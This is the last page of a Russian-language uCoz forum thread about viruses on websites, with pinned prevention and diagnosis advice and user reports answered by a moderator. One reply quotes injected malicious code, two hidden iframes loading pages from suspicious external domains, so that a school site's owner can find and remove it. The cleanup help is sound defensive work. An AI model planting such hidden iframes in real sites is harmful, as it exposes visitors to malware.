Страница 146 из 146«12144145146
Модератор форума: webanet 
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте


  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    vieska2
    Сообщений: 13
    Репутация: 0

    Сообщение # 2176 | 14:21:58
    Какие могут быть последствия попадания на сайт вируса? Его например украсть могут?
    wik1977
    Сообщений: 2
    Репутация: 0

    Сообщение # 2177 | 23:00:38
    Здравствуйте!
    На школьном сайте (адрес: http://1nadsch.ucoz.ru) при попытке зайти на главную или любую другую страницу антивирус Kaspersky блокирует вход - появляется надпись "Веб-адрес содержит легальное ПО, которое может быть использовано злоумышленниками для нанесения вреда компьютеру или данным пользователя" (скрин прилагается). При попытке зайти с помощью разных браузеров результат одинаковый - появляется данное окно.
    С уважением, Виктор.
    Прикрепления: 2118360.jpg(20Kb)
    webanet
    Личный менеджер
    Сообщений: 22908
    Репутация: 4861

    Сообщение # 2178 | 23:50:12
    wik1977, вредоносный код расположен прямо под кодом версии для слабовидящих, которую вы пытались установить лучше всего удалить версию для слабовидящих, которую вы установили и поставить системную. панель управления - настройки - общие настройки - версия для слабовидящих - сделайте настройки и сохраните
    или удалите вредоносный код. в том месте где устанавливали версию для слабовидящих удалить
    Код
    <iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=27164" style="display: none;"></iframe><iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=27164" style="display: none;"></iframe>
    и длинный скрипт перед этими двумя ифреймами. или панель управления - дизайн - управление дизайном - быстрая замена - в поле что заменить вставить
    Код
    <iframe id="a1996667054" src="https://su2lgyoeucscn.ru/f2.html?a=27164" style="display: none;"></iframe><iframe id="a754394637" src="https://doiuhrht.ru/u.html?a=27164" style="display: none;"></iframe>
    - поле на что заменить оставить пустым и произвести замену во всех модулях.
    заражение произошло из-за браузера того, что редактировал сайт

    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    lonely-wolf
    Сообщений: 211
    Репутация: 215

    Сообщение # 2179 | 12:49:49
    Что-то при заходе на сайт (как гость или с вышестоящими правами), открываются попандер-окна.
    Обозреватели: ФайрФокс и СеаМанки последних версий.
    Это вирус?
    И где?
    Сервер: s85.
    Сайт: http://society-9.ucoz.org/.

    Сообщение отредактировал lonely-wolf - Вторник, 30 Май 2017, 12:52:16
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Страница 146 из 146«12144145146
    Поиск: